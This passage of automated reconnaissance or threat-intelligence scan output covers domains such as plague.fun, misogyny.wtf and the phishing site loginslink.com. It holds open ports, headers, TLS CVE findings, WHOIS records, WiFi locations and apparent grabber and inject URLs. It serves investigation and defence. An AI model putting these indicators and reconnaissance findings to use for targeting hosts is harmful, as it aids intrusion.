u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 7, u'description': u'TCP traffic to 104.21.7.179 on port 443 is sent without HTTP header\n TCP traffic to 184.30.81.10 on port 443 is sent without HTTP header'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'1/93 Antivirus vendors marked sample as malicious (1% detection rate)'}], u'threat_level': 2, u'size': None, 
u'job_id': u'624b109abb4d0a7c532a3661', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 0, u'suspicious_identifiers_count': 1}], u'certificates': [], u'hosts': [u'104.21.7.179', u'184.30.81.10'], u'sha256': u'c01369f3b3621bdc63aef011bbf1c74b2fb984a1aff5c0120ca9738357c4c2af', u'sha512': u'b1e47a68fc0d3cd35b80ff617d80fa40cf279d3dd6f1d9a31df7282b0fc62b2ec5057020b66119af4b6846e97267f7f99384ef9e6ee0ff7192d70e76d87de00c', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://loginslink.com/', u'submission_id': u'624b109abb4d0a7c532a3662', u'created_at': u'2022-04-04T15:36:58+00:00', u'filename': None}], u'analysis_start_time': u'2022-04-04T15:43:10+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'e42f8f7948a2967d4cc53f65162d9389', u'network_mode': u'default', u'processes': [], u'sha1': u'ff9b29c3034fc1f366f8d7fd7b8b97fb38e532d7', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Phishing site', u'environment_description': u'Windows 7 64 bit', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'loginslink.com'], u'extracted_files': [], u'type_short': []}] 104.21.7.179
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 00:02:2D:05:7E:8A (Net ID: 00:02:2D:05:7E:8A) 37.780462,-122.390564
2022-12-18 00:18:35 Open TCP Port No Pulsedive 0 0 3 0 None 
188.114.97.15:80 188.114.97.0/24
2022-12-18 00:21:30 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 172.67.190.129
2022-12-18 00:13:56 HTTP Status Code No Web Spider 0 0 2 0 None None http://wasp.plague.fun/inject/Fu643XzaSbmCcnGN
2022-12-18 00:29:08 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.org.uk plague.fun
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None krillnet (Net ID: 00:01:8E:15:D4:A6) 37.780462,-122.390564
2022-12-18 00:11:10 Similar Domain - Whois No Whois 1 0 2 0 None % The WHOIS service offered by EURid and the access to the records % in the EURid WHOIS database are provided for information purposes % only. It allows persons to check whether a specific domain name % is still available or not and to obtain information related to % the registration records of existing domain names. % % EURid cannot, under any circumstances, be held liable in case the % stored information would prove to be wrong, incomplete or not % accurate in any sense. % % By submitting a query you agree not to use the information made % available to: % % - allow, enable or otherwise support the transmission of unsolicited, % commercial advertising or other solicitations whether via email or % otherwise; % - target advertising in any possible way; % % - to cause nuisance in any possible way to the registrants by sending % (whether by automated, electronic processes capable of enabling % high volumes or other possible means) messages to them. 
% % Without prejudice to the above, it is explicitly forbidden to extract, % copy and/or use or re-utilise in any form and by any means % (electronically or not) the whole or a quantitatively or qualitatively % substantial part of the contents of the WHOIS database without prior % and explicit permission by EURid, nor in any attempt hereof, to apply % automated, electronic processes to EURid (or its systems). % % You agree that any reproduction and/or transmission of data for % commercial purposes will always be considered as the extraction of a % substantial part of the content of the WHOIS database. % % By submitting the query you agree to abide by this policy and accept % that EURid can take measures to limit the use of its WHOIS services % in order to protect the privacy of its registrants or the integrity % of the database. % % The EURid WHOIS service on port 43 (textual whois) never % discloses any information concerning the registrant. % Registrant and on-site contact information can be obtained through use of the % webbased WHOIS service available from the EURid website www.eurid.eu % % WHOIS plague.eu Domain: plague.eu Script: LATIN Registrant: NOT DISCLOSED! Visit www.eurid.eu for webbased WHOIS. On-site(s): NOT DISCLOSED! Visit www.eurid.eu for webbased WHOIS. Reseller: Organisation: SECOMMERCE GmbH Language: en Email: domains@secommerce.com Registrar: Name: Realtime Register B.V. Website: https://www.realtimeregister.com Name servers: ns2.sedoparking.com ns1.sedoparking.com Please visit www.eurid.eu for more info. 
plague.eu
2022-12-18 00:12:04 Country No Country Name Extractor 0 0 3 0 None United States amenworld.com
2022-12-18 00:16:27 SSL Certificate - Issued to No SSL Certificate Analyzer 1 0 2 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 188.114.97.9
2022-12-18 00:09:14 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.2:80 188.114.96.0/24
2022-12-18 00:07:06 HTTP Headers No Web Spider 1 0 2 0 None {"date": "Sun, 18 Dec 2022 00:07:06 GMT", "content-length": "213", "content-type": "text/html; charset=utf-8", "connection": "close", "server": "Werkzeug/2.2.2 Python/3.9.11"} http://misogyny.wtf/grab/UsRjS959Rqm4sPG4
2022-12-18 00:14:46 Internet Name - Unresolved No VirusTotal 0 0 1 0 None obf.plague.fun plague.fun
2022-12-18 00:03:19 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-108.w90-116.abo.wanadoo.fr 90.116.166.108
2022-12-18 00:09:31 Open TCP Port No LeakIX 0 0 2 0 None 172.67.169.215:443 172.67.169.215
2022-12-18 00:20:42 Open TCP Port No LeakIX 0 0 3 0 None 81.88.48.102:443 81.88.48.102
2022-12-18 00:14:05 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-6329 https://nvd.nist.gov/vuln/detail/CVE-2016-6329 Score: 4.3 Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. 
188.114.97.3
2022-12-18 00:27:14 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.48.102:443 81.88.48.102
2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 104.21.28.240
2022-12-18 00:30:48 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.app plague.fun
2022-12-18 00:25:33 Affiliate - Domain Name No DNS Resolver 0 0 3 0 None securemail.pro tb-fr.securemail.pro
2022-12-18 00:04:28 Raw DNS Records No DNS Raw Records 0 0 1 0 None misogyny.wtf. 1800 IN MX 20 eforward5.registrar-servers.com. misogyny.wtf. 1800 IN MX 15 eforward4.registrar-servers.com. misogyny.wtf. 1800 IN MX 10 eforward1.registrar-servers.com. misogyny.wtf. 1800 IN MX 10 eforward2.registrar-servers.com. misogyny.wtf. 1800 IN MX 10 eforward3.registrar-servers.com. 
misogyny.wtf
2022-12-18 00:21:03 Web Technology No Web Server Identifier 0 0 4 0 None Express {"content-length": "998", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Sun, 11 Sep 2022 13:17:14 GMT", "connection": "keep-alive", "etag": "W/\"3e6-1832cb26b90\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:19 GMT", "access-control-allow-origin": "*", "content-type": "text/css; charset=UTF-8"}
2022-12-18 00:21:03 Web Technology No Web Server Identifier 0 0 3 0 None Express {"content-length": "1078", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Thu, 03 Nov 2022 03:05:34 GMT", "connection": "keep-alive", "etag": "W/\"436-1843b737830\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:17 GMT", "access-control-allow-origin": "*", "content-type": "text/html; charset=UTF-8"}
2022-12-18 00:10:49 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-2183 https://nvd.nist.gov/vuln/detail/CVE-2016-2183 Score: 5.0 Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. 
188.114.96.1 2022-12-18 00:02:55 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:43:a4:7d:29:1f:15:0e:6b:ac:86:e4:4b:c0:be:69:71:a9 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Oct 6 20:16:48 2022 GMT Not After : Jan 4 20:16:47 2023 GMT Subject: CN=hook.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:f0:6d:9d:3e:65:e2:27:e7:f9:e7:b1:43:5d:9b: 9c:71:a3:74:87:8a:60:c8:7f:29:27:0c:3b:70:18: 0e:65:ff:e2:e4:6c:b2:93:6d:33:61:6a:bf:38:4f: 05:cd:5b:2e:49:18:0c:c5:32:5e:a6:f8:13:92:a2: 54:15:20:f1:b8 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 2D:72:09:99:1A:17:4B:10:83:60:E6:EB:30:F2:51:56:F6:45:4B:C4 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:hook.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : DF:A5:5E:AB:68:82:4F:1F:6C:AD:EE:B8:5F:4E:3E:5A: EA:CD:A2:12:A4:6A:5E:8E:3B:12:C0:20:44:5C:2A:73 Timestamp : Oct 6 21:16:48.471 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:B6:95:B7:C7:1C:80:2B:FD:7A:41:2D: D1:EE:2B:F0:0C:C7:D5:AD:4A:C9:E0:25:F1:61:3A:42: F4:C7:98:23:BC:02:21:00:B0:8C:72:F0:4F:8A:E8:6C: E9:F6:34:39:22:96:3C:C5:FF:9B:84:63:71:CD:62:74: 2D:25:B6:5D:82:07:80:00 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 
15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Oct 6 21:16:48.762 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:DA:81:A7:33:FB:84:F9:8B:E8:59:67: 5A:B3:BB:7D:23:4E:13:C6:1F:EE:CC:11:CA:90:D9:C7: C2:B8:84:2C:2D:02:21:00:A5:46:C0:7E:74:96:53:9F: 09:9C:0C:0A:E5:A6:43:B1:BB:DE:4F:9A:14:FF:CA:3E: 71:1D:06:51:72:4F:0A:A0 Signature Algorithm: sha256WithRSAEncryption 55:5a:e5:d4:fc:c1:91:97:fc:62:bf:e7:7d:ab:bf:5e:2a:ad: c4:a2:38:e6:93:85:38:b7:1d:d3:de:32:0e:e2:4c:99:4d:11: 27:08:6e:c9:87:6b:86:71:63:52:48:6f:97:81:d6:f9:d3:dc: 30:6a:31:71:f9:50:72:a5:5c:59:fc:73:29:d0:b8:38:7a:27: 41:b3:38:31:80:5b:74:88:40:5c:51:13:29:ba:41:ab:49:a7: e8:e8:a1:04:15:8b:d3:c3:02:3a:31:08:81:2e:a2:e2:41:9c: f5:7c:f1:58:bd:ec:4c:d9:0f:e7:c3:72:72:de:1f:50:66:17: 23:e5:df:b5:36:49:5e:e1:af:17:75:d9:18:54:94:ad:e0:ae: 38:ac:2c:09:c5:01:1b:8f:32:6d:7c:38:3e:2d:4f:0d:f7:64: fd:89:7a:f0:42:66:14:a5:26:b2:2b:cf:14:ba:10:2f:cc:af: d0:b7:ba:7a:29:73:d4:f3:c1:81:fe:b4:29:3b:c6:4b:56:c8: 19:d2:3a:d5:73:1c:13:73:cf:59:a2:f3:e1:26:e5:8e:fe:04: 40:3b:31:4f:84:d4:d1:f1:ca:a5:a1:c2:9f:31:f4:54:e2:fe: 50:4a:40:71:15:f7:ff:77:5d:a2:45:82:9e:19:be:52:a9:21: 85:4e:41:e2 plague.fun
2022-12-18 00:31:50 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: PLAGUE.ONL Registry Domain ID: D425500000332721757-AGRS Registrar WHOIS Server: whois.godaddy.com Registrar URL: http://www.godaddy.com Updated Date: 2022-11-06T10:11:01Z Creation Date: 2019-11-05T05:26:43Z Registry Expiry Date: 2023-11-05T05:26:43Z Registrar Registration Expiration Date: Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Reseller: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: 
clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod Registrant Organization: Domains By Proxy, LLC Registrant State/Province: Arizona Registrant Country: US Name Server: NS65.DOMAINCONTROL.COM Name Server: NS66.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:30:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Domain Name: plague.onl Registry Domain ID: D425500000332721757-AGRS Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2022-11-06T10:10:59Z Creation Date: 2019-11-05T05:26:43Z Registrar Registration Expiration Date: 2023-11-05T05:26:43Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: CR394993769 Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 2155 E Warner Rd Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85284 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.onl Registry Admin ID: CR394993781 Admin Name: Registration Private Admin Organization: Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 2155 E Warner Rd Admin City: Tempe Admin State/Province: Arizona Admin Postal Code: 85284 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 Admin Fax Ext: Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.onl Registry Tech ID: CR394993775 Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 2155 E Warner Rd Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85284 Tech Country: US Tech 
Phone: +1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.onl Name Server: NS65.DOMAINCONTROL.COM Name Server: NS66.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:31:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice. 
plague.onl
2022-12-18 00:14:30 Malicious IP Address Yes Internet Storm Center 0 1 2 0 None Internet Storm Center [188.114.97.3] https://isc.sans.edu/api/ip/188.114.97.3 188.114.97.3
2022-12-18 00:12:19 Phone Number No Phone Number Extractor 0 0 2 0 None +19854014545 Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. 
Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. 
reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: 
dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:10:04 Linked URL - Internal No URLScan.io 0 0 1 0 None http://misogyny.wtf:8080/ misogyny.wtf 2022-12-18 00:07:29 HTTP Status Code No Web Spider 0 0 2 0 None None http://20.224.2.213/ 2022-12-18 00:12:44 Physical Location No ipapi.co 0 0 2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3036::ac43:a9d7 2022-12-18 00:24:07 Affiliate - Email Address No E-Mail Address Extractor 0 0 2 0 None info@newtabgallery.com [{"platform": "Chrome", "version": "0.37", "data": {"extcalls": ["https://home.newtabgallery.com/", "https://newtabgallery.com/welcome/?theme_id=", "https://newtabgallery.com/uninstall/?theme_id"], "webstore": {"website": "", "rating": 4, "privacy_policy": "https://newtabgallery.com/privacy-policy", "last_updated": "2018-12-23", "name": "Plague Inc HD Wallpapers New Tab Theme", "price": "", "offered_by": "", "support_site": "https://www.newtabgallery.com/support", "version": "", "address": "", "short_description": "Includes HD wallpaper images of the game Plague Inc on every new tab.", "permission_warnings": [], "users": 60, "size": "413KiB", "type": "Extension", "email": "info@newtabgallery.com", "rating_users": 1, "icon": "https://lh3.googleusercontent.com/LkIiFecj0j57Vv8kQivIobtgsj7K22WUUE1FdqwQCnmDz2Nuj-45Vqyt44TeCd-CofWCIjcoSrjkv_7GX2-JA8xqVw=w128-h128-e365-rj-sc0x00ffffff"}, "risk": {"webstore": {"website": 1, "last_updated": 5, "users": 1, "address": 1, "total": 9, "rating_users": 1}, "metadata": {}, "total": 411, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "permissions": {"total": 25}}, "related": {"gapecdeolbiphmnkcigpgmncnhjnkhom": {"rating": 3, "users": 466, "platform": "", "short_description": "CS GO wallpapers extension offers great images with 
every new tab and was made for all fans of CS GO.", "icon": "https://lh3.googleusercontent.com/Q6A61RgzCT3Fsha5p3p_mYUuD_ulqAPXk7PqjmQ0kKyA7-gCxlIDyggIfaIGhhAvmO0UFfQk0cZbcTBVSG7iQtCh=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1, "name": "CS GO HD Wallpapers New Tab"}, "fpmmkkfgclmhcolgmcpjdkfpehgbedim": {"rating": 5, "users": 1000, "platform": "", "short_description": "Replace your new tab with the PUBG Features Custom page, with bookmarks, apps, games and PUBG Game pride wallpaper.", "icon": "https://lh3.googleusercontent.com/8FgkvHkd8sXLvGpg-QpO56iMck1xP9Bv3bV6OwkflKNyr6P2t8wDU1tCFg_N3rlo4f8T730LemwO9w1rH_uQ_t5o=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5, "name": "PUBG Features Wallpapers HD New Tab"}, "hhpdpohbancinfchpkgliloaocffpceb": {"rating": 3.3666666, "users": 776, "platform": "", "short_description": "Are you ready to be a gunner? Knock balls is a shooting game. Hard levels await you.", "icon": "https://lh3.googleusercontent.com/roRilPyAjm7U77eNqM3m2geyI7mMVOEsYkMdZpqIOQS6cO3GhqVYfi9fHPLCNM2lNCjWZB-HmOQpvaDvJGH7MzyDE_A=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 30, "name": "Knock Balls Game New Tab"}, "dodmbeoncpkfkefgbfiahafdgiccfhmb": {"rating": 4.9995656, "users": 5050, "platform": "", "short_description": "Check Out Our Fortnite Lama Live Wallpapers And Mini Games Date And Time Widgets...", "icon": "https://lh3.googleusercontent.com/76unrUKGATgdPR0Zl3po_OK3mWOQ82IhyHePJdSoxHIIw4pgCnqruTlz8g85NzGl5oqaV0fU0Kk=w128-h128-e365", "rating_users": 2301, "name": "Fortnite Lama Live New Tab Backgrounds"}, "pmnbmfmpehpncbfjfpnfailicicocaap": {"rating": 3.3043478, "users": 1482, "platform": "", "short_description": "Do you like American football game? 
